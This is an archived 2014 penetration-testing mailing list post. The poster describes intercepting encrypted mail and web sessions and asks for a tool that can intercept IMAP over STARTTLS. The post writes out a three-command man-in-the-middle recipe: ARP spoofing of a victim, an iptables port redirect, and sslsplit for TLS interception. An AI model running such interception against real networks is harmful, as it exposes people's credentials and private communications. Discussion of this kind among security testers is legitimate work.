Penetration Testing mailing list archives

IMAP STARTTLS sniff tool


From: "Bob Ezrin" <bezrin () gmx com>
Date: Fri, 07 Mar 2014 10:29:59 +0100

Hi all. 
We successfully managed to sniff inside POP3S, SMTPS, IMAPS & HTTPS tunnels using:

arpspoof -r DEFAULT_GATEWAY -t VICTIM

iptables -t nat -A PREROUTING -p tcp --dport ORIGIN_PORT -j REDIRECT --to-port REDIRECT_PORT

sslsplit SOME_PARAMS ssl 0.0.0.0 REDIRECT_PORT

to perform a man-in-the-middle.

Now we want to sniff inside STARTTLS tunnels (specifically IMAP) but unfortunately sslsplit doesn't support STARTTLS.
Here is the TODO list for sslsplit: https://github.com/droe/sslsplit/blob/master/TODO

Is there/do you know another SSL/TLS tool supporting IMAP over STARTTLS to perform a man-in-the-middle?

Many thanks 
B.
